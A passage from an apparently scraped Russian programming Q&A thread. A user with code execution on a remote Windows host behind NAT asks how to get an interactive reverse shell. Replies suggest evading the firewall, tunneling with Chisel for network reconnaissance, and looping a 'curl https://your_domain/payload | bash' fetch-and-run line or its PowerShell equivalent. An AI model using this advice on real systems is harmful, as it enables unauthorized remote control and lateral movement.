169 похожих чатов

Есть доступ к win машине за NAT в удаленной сети,

могу выполнить любой программный код на ней, какие есть варианты интерактивной сессии коммандной ?
перенаправление stdinput stdoutput cmd.exe в сокет открытый почему-то приводит к тому, что сессия обрубается сразу как только приходит на удаленный netcat, предпологаю дело в фаерволе или что-то такое, какие еще есть варианты back connect ?
Может как-то заюзать PsExec ?

10 ответов

6 просмотров

Я думаю что тебе по определению нужно будет тыкать рулсы для файрвола. Если есть возсожность выполнения команды, сделай элементарное перечисление, чтоб понимать что можешь а что нет. К примеру если у тебя разрешена возможность обращения кудато на http, можешь повесить редиректор и таким образом увернуться от правил FW. но реально нужно понимать где ты и что имеешь

Кстати, если у тебя есть возможность залить файлы, можешь попробовать покинуть соксы, высокие права тебе для этого не нужны. И уже через них смотреть всю сетку

philip kirkorov
какие например ? 3аразу ?

да причем тут это. Чизель залить и проксировать на себя трафик. Потом, зная адрес сети, можешь провести более глубокую разведку.

если надо чтобы просто работало - можешь запилить виндовый аналог curl https://your_domain/payload | bash в цикле

philip-kirkorov Автор вопроса
Dmitriy
если надо чтобы просто работало - можешь запилить ...

контекст win нет баша и крула естественно тоже по дефолту

philip kirkorov
контекст win нет баша и крула естественно тоже по ...

Ну так аналог же, ты чего? Вот загуглил Invoke-WebRequest -URI https://www.educative.io/

philip-kirkorov Автор вопроса
Dmitriy
Ну так аналог же, ты чего? Вот загуглил Invoke-Web...

интерактивная сессия нужна - такая задача

philip kirkorov
интерактивная сессия нужна - такая задача

Собирай инфу на тачке, так будет проче

philip-kirkorov Автор вопроса

Похожие вопросы

Обсуждают сегодня

Всем привет, написал код ниже, но он выдает сегфолт, в чем причина? #include <stdio.h> #include <stdlib.h> #include <string.h> struct product { char *name; float price; };...
buzz базз
75
База данных не поможет. Шифрование не поможет. Какие там ещё варианты? Накидывайте.
КТ315
20
А табстоп это сообщение от окна или от элемента управления?
The Bird of Hermes
18
А как лучше конвертировать физический адрес в виртуальный при маппинге? В случае ядра у меня, например, direct mapping, первые 768МБ я как есть мапплю в higher half, а остальн...
Evg Resh
26
Всем привет. Подскажите, пожалуйста, как вы реализовываете следующий функционал. Допустим есть форма, в которой имеется выпадающий список со значениями. Значения хранятся в БД...
Евгений
7
Открыл свой двухкилобайтный экзешник в x32dbg, а тут какая-то хрень. Смущает кнопка "выполнить до пользовательского кода", а что ещё может быть в файле помимо него ?
НѣкъиⰘижєжєиꙁъвьсєсвѣтьноѣсѣтиѥсть•
11
Всем привет, подскажите/посоветуйте пожалуйста. Фаердак компоненты, имею одно место где бизнес хочет видеть при открытии формы список всех клиентов, это порядка 30к. Мои дово...
Sasha Sch
14
Хотел бы спросить у знающих, правильную ли я выбрал книгу для начала изучения ассемблера Юрова В.И ? Или есть более лучшие книги для начала обучения?
Botsman
31
Мне были интересны дишные хаки и я нашёл любопытный способ на форуме через __traits, что-то вроде int delegate(int) fac = (int n) => n == 0 ? 1 : n * __traits(parent, {})(n - ...
Constantin F.
1
$params = [ 'formid' => 'feedbackForm', 'formTpl' => '@CODE: <form class="form-validate" data-id="ajax_form"> <fieldset class="margin-bottom-md"> ...
Pathologic
1
Карта сайта